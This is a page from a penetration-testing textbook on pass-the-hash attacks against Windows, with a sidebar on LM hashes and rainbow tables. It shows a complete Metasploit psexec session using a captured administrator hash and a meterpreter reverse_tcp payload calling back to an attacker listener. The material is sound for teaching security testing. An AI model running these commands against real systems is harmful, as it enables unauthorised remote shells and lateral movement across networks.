84
Chapter 6
was longer than 14 characters, Windows can no longer store an LM hash, and
it uses the standard
aad3b435 . . .
string, which represents a blank password.
Pass the Hash
In the preceding example, we ran into a slight complication: We have the
administrator’s username and password hashes, but we can’t crack the pass-
word in a reasonable time frame. If we don’t know the password, how can we
log into additional machines and potentially compromise more systems with
this one user account?
We can use the
pass-the-hash
technique, which requires that we have only
the password hash, not the password itself. Metasploit’s
windows/smb/psexec
module makes this all possible, as shown here:
msf>
use windows/smb/psexec
msf exploit(psexec)>
set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec)>
set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(psexec)>
set LPORT 443
LPORT => 443
msf exploit(psexec)>
set RHOST 192.168.33.130
RHOST => 192.168.33.130
. . . SNIP . . .
msf exploit(psexec)>
set SMBPass
aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
SMBPass => aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
msf exploit(psexec)>
exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...
T H E P R O B L E M W I T H L M H A S H E S
Just for fun, try the following: Change your password to something complex that is
14 characters or less. Then extract the password hashes from the system with
hashdump
and copy the first hash value (such as the portion beginning with
aad3b435
This is a
rainbow table
attack. A
rainbow table
is a precomputed table used for
reversing cryptographic hash functions, usually for cracking passwords. Rainbow
tables use every combination of characters including 1–7, a–z, special symbols, and
spaces. When you submit your hash to an online cracker, the site’s server searches
through gigabytes of rainbow tables for your specific hash.